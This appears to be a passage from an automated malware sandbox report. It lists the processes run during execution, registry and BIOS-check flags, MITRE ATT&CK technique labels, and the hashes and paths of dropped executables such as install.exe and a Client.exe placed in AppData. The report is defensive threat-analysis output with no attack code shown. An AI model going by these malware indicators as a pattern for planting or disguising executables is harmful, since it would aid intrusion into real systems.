
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3888

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3984

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4192

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4384

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:5000

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3584

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:1752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4768

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4332

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2936

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:252

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4572

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
1⤵
PID:1140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:5068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:4540

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3208

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2776

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4596

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Filesize
4KB

MD5
1bfe591a4fe3d91b03cdf26eaacd8f89

SHA1
719c37c320f518ac168c86723724891950911cea

SHA256
9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8

SHA512
02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Filesize
338B

MD5
2846e3a24f0b554b6fbdde8895586f71

SHA1
8902f8a79966d8aea8f665d78d5fe147bfb3fe71

SHA256
6239a606f8307e2a4e44c3842f23f34c1ef42b5656272c731eafc71917f1a8ca

SHA512
9cad77f5736bf934c63c8e4fd5b3d7854a3a2682168e2064619c3f3f71bf49a589f3c587790088369ce7df26db3b23aa18cde1e4b51dce86557f256cb36d8e1a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
404B

MD5
9ebb917919a38a9fa15f56ac59262c47

SHA1
3f21f4ca3fbaed23ccbbfb8116f368cf683e5ff0

SHA256
c072a39c0664c76e164968ab82feb0253e033a61b6a03dddc6dc43fc9858ac99

SHA512
bbe6906ec095c4db525d03dc1b525ef65594fc4d3e737b4bc5d063016c968a45f0e4a83883b2be9cf3c9c6746beb89b56624da9426bacc9c15b857c6907d3c56

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
7915c5c12c884cc2fa03af40f3d2e49d

SHA1
d48085f85761cde9c287b0b70a918c7ce8008629

SHA256
e79d4b86d8cabd981d719da7f55e0540831df7fa0f8df5b19c0671137406c3da

SHA512
4c71eb6836546d4cfdb39cd84b6c44687b2c2dee31e2e658d12f809225cbd495f20ce69030bff1d80468605a3523d23b6dea166975cedae25b02a75479c3f217

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9faad3e004614b187287bed750e56acc

SHA1
eeea3627a208df5a8cf627b0d39561167d272ac5

SHA256
64a60300c46447926ce44b48ce179d01eff3dba906b83b17e48db0c738ca38a9

SHA512
a7470fe359229c2932aa39417e1cd0dc47f351963cbb39f4026f3a2954e05e3238f3605e13c870c9fe24ae56a0d07e1a6943df0e891bdcd46fd9ae4b7a48ab90

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
220KB

MD5
f1e4c11365eb7ce78b6b7852ea2c4323

SHA1
0270ab14599e2854835a6d65236bc9dfa10c7ede

SHA256
83a39a40b09c8e84cf903991673bc95bcb54ee190358f2db72afde5ed36fa858

SHA512
b3ec28ab96600f311272300f3ae9f79f44fd7ff43c1b561b86ca0faf4805951c7122aae3166463c2e3f79e07987eab99840e13aae7756fda5f87f62f3b3d9939

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
794KB

MD5
94467638ef8d7e781e4a65449cfd0cdf

SHA1
07b315043c92ca7de37c2de6e791513869a17fb5

SHA256
ff7abe86cde71bb1d9534fe637e35b9922b84c1c9ee5ed2a447b5086bfea9b9c

SHA512
c8ea932dd4f58d981afbb465b0d64edf3ed79381e2bd14e1bb76b5d2284e1c72c17d5f13088d5adb062bb5367f33a045f0068b4eb15b35841233275575daabe6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
576B

MD5
e350fc58e63b85c52d3d0421fceda48d

SHA1
56629d06d4624e7142f5e43a9ac905d83e2397a9

SHA256
ddf51c0648c5e75334df24bf4ff64bfbc475c7fa72dba126a47f2ad1fb7f7c5c

SHA512
9eacb6b712666d31334657caad128e25ea0f4f77b8f36b89c3f1ef6222bc8dfc7641445e15459926bb5dd405bda072af6cbfd9b242ab6e8078b9512658c3c610

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
23d35a151d49b40fb9e4b8f4caf9a876

SHA1
f64e1b81b5d44eaf0547d67baf6b73719aa57200

SHA256
d3b62a4390bcdfc22c7b88c94c33bf49814fab6dfd61beaccb2e396e4226d72c

SHA512
ddda9494b4f5285fb02cff927c3f552a52dd13d13e78c12da5477f17b1600614810559b7b66b150c09dae9e70d2efc8750751bcbcfb43b47c5c305c3e70932e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Platform Notifications\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
769f76de142bd5a4bbaffa12af19556f

SHA1
72c01932c18a0ed8075749dc06b4de378ff0d8ce

SHA256
4b7392fffd9a2a361ddda03630710db0dd80993381ff29b31ace7c92788bbcc5

SHA512
6343e2cc6b6e268279aa5ecebfb2f0c3e5b364c626eb5c88fcd5b0c8f6edf5548889b49e9add0c490df0f2fa96e260135a72f7c6d56da5fa5135502acbdfa0c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
b3af9eb044095f98b6c5ee97a377cde1

SHA1
97c3cf646de519ec9e7389176a8438b44203c889

SHA256
4b1ebacb26f19f9fa00ced7f619fb3810c62a2358e4f9d108418fdb18d131363

SHA512
d5f62b24ca7619c273c51fc2b4a18298d0c14d9af327abb7da086af812df973fbd755d2fe4f663730c2bafcf5536b6adb1f1767f5c2bf355850f3557cb25c157

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
ff8b8a56b587a191196b0681b3b9d174

SHA1
0a2f823fd512f4f1308e7e5419c0fb49996d9f6e

SHA256
4c20a0684313c26df0cd6e3ae7fec01e710fa5c3374029db100bd802579b4677

SHA512
cac3a7bb62483a4c62fbf06f1af3f50afb18f7988e8d2c8720b91ba16dede535041ad0fccda8f6c1a1695c64a7345b0f6dfa28d40c133e49de49a9bca38b160b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\055976ec-f06d-41ad-a51e-09a4078e4bbf\index-dir\the-real-index

Filesize
2KB

MD5
d055d3668d039ecae15b65d055128774

SHA1
b12b97f1d945488f958cb658ea56ba437c2dbd71

SHA256
1e9b18ef3e97e15ad9c1df77c882a3c17c657ae21af5a8540aec229dc62f3f4f

SHA512
6f4118d912865a6b8223f474b1d6b185b66f782b9328879bf3795acddd7de9c4c67ec1e54417deccd51cb4742ff2ef1d969cf2a2b0d0a22921ca68e30432d43f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\055976ec-f06d-41ad-a51e-09a4078e4bbf\index-dir\the-real-index~RFe5940b8.TMP

Filesize
48B

MD5
9f9507956790a909f4de188253ddff73

SHA1
dc919dd1eb93fc5b2baf80e7b8aa7a3fdb8877a3

SHA256
0fd3407c6d2772afa6256843118685d0a54f1be17cb5a265ca7518723910a3fc

SHA512
f47ccd20099abf6927444301863ec09d0b75d6ee6b100da41c3a8fed85dd9551a10625fbfc3c2cc49ca596f77ce038929a6e463fc1b01f2a46c8aa8148757fb3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\0f36cedd-5f8e-4747-b6c9-535106d4425b\index-dir\the-real-index

Filesize
288B

MD5
e640f1d294dac505f3cdc030075c0094

SHA1
7f4bf611f5582ef961374a4d506895480fe561f7

SHA256
f29c10a0d02948103ea5a0e25f2f5a324c6196c2cac07ee185ce9303cebdbb60

SHA512
6502d101c44a8b7dbfca272a51db9385e408353863920ac46e4b56ca5e5d4bffceaebb5f93a81d5950592cc0a526d98f603347e91e83e182aa7ad6430f3cd61f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\0f36cedd-5f8e-4747-b6c9-535106d4425b\index-dir\the-real-index~RFe594b19.TMP

Filesize
48B

MD5
4513f7733796b5d636cffb3e36bf2fd1

SHA1
b19fe47bf399aa1fdcc0fa6017053e446952786a

SHA256
74c2c3b1a960324396a5886f6ee41ac569f5ce3db77eb78b1a0a137739ff1b9c

SHA512
a27297f5fabdd25905619526e67cf713e7b2b25f4b26949ed679e97760a49a0d9d342c3c69d85eaa3bc24fb8be2ee15fbf858d260869a717cddd817705c56b29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\476e3f8c-5c27-49fa-ab82-dad1e4bc4065\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
89B

MD5
0873ccf35aa22f676af67465e8305349

SHA1
1e087eabddee3df781ce22eb7aaaba70cf10569a

SHA256
44997c229e4e720e7a01cd6333189e2ffc481e25b921cd1f5a6ae674ab7e0063

SHA512
df8581775be4e4e6a7377ef3337582c85451c30982c21e57b7b075b6efa1af4c98f3a666b9b7086da5cf99db9c8bdc78f21938130a5b647aeda713a21208c403

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
146B

MD5
36e4054df77d7d7df3b095bde71586a0

SHA1
21d81368d73f25ebb2178eeb5b189a0e7e0faa37

SHA256
a039423de7ef39d8ca4635006b9b66ed92fcf456b2d573f0689a9bb1579a4d39

SHA512
d042ccb9f471c84108a09bab6f0652843aeceda7bd802c43627375dbba50ca32d9f3ea604851577fc6e2f1db14310976b5d6a14b8b23347269fbc206dadec211

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
148B

MD5
ffc4c2f544ce014419432e1366bdffc5

SHA1
3fce754229822b6ac1d87f49a4c3bf88860f165a

SHA256
f1126a718869b2c75eba48d853542139a6ac60ac187c5313970b1d735e4871f8

SHA512
f4191c8615075cd2034227e9ce46a54d071b6460c53edd88af1faf8dcc1fc0790eb05dca582afc7677c153ff432bdf3104e6d6b2ab0ba0515efe93dc2ec85253

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
157B

MD5
06d274cf4b354a3bd89c676a339ca06f

SHA1
4cac9a42337b570c83f5ddd9060f5bcb1dcac54b

SHA256
f93e91b77c3f81aaa55fdb70c38f750869c063743804bb16379b902a8605d80f

SHA512
82ad45f76bd96031f85e69de53e3bc3539ad4bed900c303977aead8a011c6d58e5927404b7e14ae644d8e798f209bf00fe1f50bca5e2463ce0e50c52fa4e8fa7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
153B

MD5
0806815b40951c4e1581c2599718330f

SHA1
662f2f15f6f4f7ab3b87b6e88ff56dc165382438

SHA256
de4faf0114f84912f7ffca9099da12828681b411300ef30335405f6e146b0015

SHA512
06b34f59509906b32662ac207904ffbdf8a489614c2251a227452245f7386c31e6418c6bb5f8765a81b98ed19a7f6446fd914356cf027b965ddc2cbab1237cf6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
82B

MD5
38fb99a214ee17aad0b2c7244bc0ae8f

SHA1
f3afec11e6bb748707822cffcf5e8f31c679f296

SHA256
8e341b9b9522bd1b992882c88f30930e8442b5cbf9bb9ece991949873bc7b350

SHA512
8e98c7adf265eeb6944efaa49511c9cac09da73e90056554c3c1ccf0838396ca795603b576b2343aafac3db41469cc8f240728004de95c87ed55a8d33eb471d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
84B

MD5
7c4d0f569150f88483b61dc6114224d3

SHA1
656226fbef36099ff3b9532dcd8f5634f782cf6e

SHA256
f38c57bfda5181efff6d32eefe45a5142ec2284fdbfa5d22aec42239b48a883e

SHA512
a9086787aa47953bde306115cec1c636069c29fd8dcd0f093da09e808a0baf5331046783e63a34d51d912e0d1a9b3e9831c97e727b216e62e9e91a994a405c38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
62067fd9914c0b2df08a51f15cd27d1f

SHA1
b826424f37339475df2b1e837383e16c069a71f8

SHA256
d35ce5549e6089c1b977c2d3d8d48ef023669d71b424977ec3822e25715d8d78

SHA512
c7b02fecc9d772e2ae2d3788a092df6af83e4b102d9f4d6ca8800b6820a39492c7384f7d362a3f480b4a6d2c5a79a18c0b366502d990ed89736c9a4f01a70447

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe594b19.TMP

Filesize
48B

MD5
a14409650c6080ea938ae7feac794681

SHA1
2e0dd61f8d91a8f685989c33df09b07d1d560594

SHA256
150f4e35b6f45e9731b7e494da785a489ed5173ceffa8e55398534540f37886a

SHA512
18b988a74f390f292d9adfe427ba7f0a6a46a3356b2b5231b18fb43bfea24919047795da8e3b5cdaf6386a8a28fde08f4b5a87fe96f1c0ff5bee853b75aa9481

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
86f26ac6af774f33ba5b4b34b605b68d

SHA1
b85d42e4a12abe71379af447516c03dde999a7ee

SHA256
4b7cae0206050d2ceaeeee37381973ef45547f7512db255c32f473b02c3861d8

SHA512
b5311da0dc93bb1a4d98d05ac3b525f5ac68777f2c5650e821631c691aee852b7f95584da0d9c969a047be8d80f9a2503502a2e61fae821281d61114bd5533fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
a9a37479bd6f1bca93affcb29cee160d

SHA1
768742f700909992e9c72aff8e4e5836fcbdeb94

SHA256
57ffc99cf562261f79700ae810cee5fd331acd411263b077f8beee511ef83c8a

SHA512
0bd6558bc0e66b1f72561e7dde50f4415371ae173164f1f30fd628e4de0f26c9907d12dd8b5329fef3961ce7cd6366c6bacb103d9c41309546bde0f3940db687

Download Submit
C:\Users\Admin\AppData\Local\Temp\XdYRHiNDnO3c.exe

Filesize
131KB

MD5
bd65d387482def1fe00b50406f731763

SHA1
d06a2ba2e29228f443f97d1dd3a8da5dd7df5903

SHA256
1ab7375550516d7445c47fd9b551ed864f227401a14ff3f1ff0d70caca3bd997

SHA512
351ecd109c4d49bc822e8ade73a9516c4a531ebcda63546c155e677dcff19708068dc588b2fcf30cad086238e8b206fc5f349d37dda02d3c3a8d9b570d92e4d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\install.exe

Filesize
162KB

MD5
152e3f07bbaf88fb8b097ba05a60df6e

SHA1
c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

SHA256
a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

SHA512
2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

Download Submit
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

Filesize
409KB

MD5
4c2bb0618a6eda615c8001d5a7ccd6c0

SHA1
c88d2c8bfc5906a5cfef78893d1132edcffd71f0

SHA256
abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6

SHA512
6abe53339656a023e2a0547f1c2249789c33091d67a21f2e689c6411dc5357e34ec3c65634b6f6955a5023d20803f7c746b13f574bcd84b008abb4a97ea61027

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_epraksq3.wdc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/480-92-0x0000019814AF0000-0x0000019814B1B000-memory.dmp

Filesize
172KB

Download
memory/480-98-0x0000019814AF0000-0x0000019814B1B000-memory.dmp

Filesize
172KB

Download
memory/480-99-0x00007FF8A3790000-0x00007FF8A37A0000-memory.dmp

Filesize
64KB

Download
memory/632-59-0x000001C35DCC0000-0x000001C35DCEB000-memory.dmp

Filesize
172KB

Download
memory/632-57-0x000001C35DC90000-0x000001C35DCB5000-memory.dmp

Filesize
148KB

Download
memory/632-58-0x000001C35DCC0000-0x000001C35DCEB000-memory.dmp

Filesize
172KB

Download
memory/632-65-0x000001C35DCC0000-0x000001C35DCEB000-memory.dmp

Filesize
172KB

Download
memory/632-66-0x00007FF8A3790000-0x00007FF8A37A0000-memory.dmp

Filesize
64KB

Download
memory/692-76-0x000001FD31530000-0x000001FD3155B000-memory.dmp

Filesize
172KB

Download
memory/692-77-0x00007FF8A3790000-0x00007FF8A37A0000-memory.dmp

Filesize
64KB

Download
memory/692-70-0x000001FD31530000-0x000001FD3155B000-memory.dmp

Filesize
172KB

Download
memory/752-103-0x000001C38F060000-0x000001C38F08B000-memory.dmp

Filesize
172KB

Download
memory/996-88-0x00007FF8A3790000-0x00007FF8A37A0000-memory.dmp

Filesize
64KB

Download
memory/996-87-0x0000015094540000-0x000001509456B000-memory.dmp

Filesize
172KB

Download
memory/996-81-0x0000015094540000-0x000001509456B000-memory.dmp

Filesize
172KB

Download
memory/1636-46-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1636-47-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1636-48-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1636-49-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1636-53-0x00007FF8E2780000-0x00007FF8E283D000-memory.dmp

Filesize
756KB

Download
memory/1636-52-0x00007FF8E3700000-0x00007FF8E3909000-memory.dmp

Filesize
2.0MB

Download
memory/1636-51-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1636-54-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4624-7-0x0000000006CD0000-0x0000000006D0C000-memory.dmp

Filesize
240KB

Download
memory/4624-0-0x0000000074DEE000-0x0000000074DEF000-memory.dmp

Filesize
4KB

Download
memory/4624-1-0x0000000000F40000-0x0000000000FAC000-memory.dmp

Filesize
432KB

Download
memory/4624-2-0x0000000005F10000-0x00000000064B6000-memory.dmp

Filesize
5.6MB

Download
memory/4624-3-0x0000000005AE0000-0x0000000005B72000-memory.dmp

Filesize
584KB

Download
memory/4624-4-0x0000000074DE0000-0x0000000075591000-memory.dmp

Filesize
7.7MB

Download
memory/4624-5-0x0000000005B80000-0x0000000005BE6000-memory.dmp

Filesize
408KB

Download
memory/4624-6-0x0000000005ED0000-0x0000000005EE2000-memory.dmp

Filesize
72KB

Download
memory/4624-20-0x0000000074DE0000-0x0000000075591000-memory.dmp

Filesize
7.7MB

Download
memory/4804-14-0x0000000074DE0000-0x0000000075591000-memory.dmp

Filesize
7.7MB

Download
memory/4804-13-0x0000000074DE0000-0x0000000075591000-memory.dmp

Filesize
7.7MB

Download
memory/4804-1291-0x0000000074DE0000-0x0000000075591000-memory.dmp

Filesize
7.7MB

Download
memory/4804-34-0x0000000006890000-0x000000000689A000-memory.dmp

Filesize
40KB

Download
memory/4804-1292-0x0000000074DE0000-0x0000000075591000-memory.dmp

Filesize
7.7MB

Download
memory/4804-2087-0x0000000074DE0000-0x0000000075591000-memory.dmp

Filesize
7.7MB

Download
memory/5068-22-0x000001F908130000-0x000001F908152000-memory.dmp

Filesize
136KB

Download
memory/5068-43-0x000001F9205C0000-0x000001F9205EA000-memory.dmp

Filesize
168KB

Download
memory/5068-45-0x00007FF8E2780000-0x00007FF8E283D000-memory.dmp

Filesize
756KB

Download
memory/5068-44-0x00007FF8E3700000-0x00007FF8E3909000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads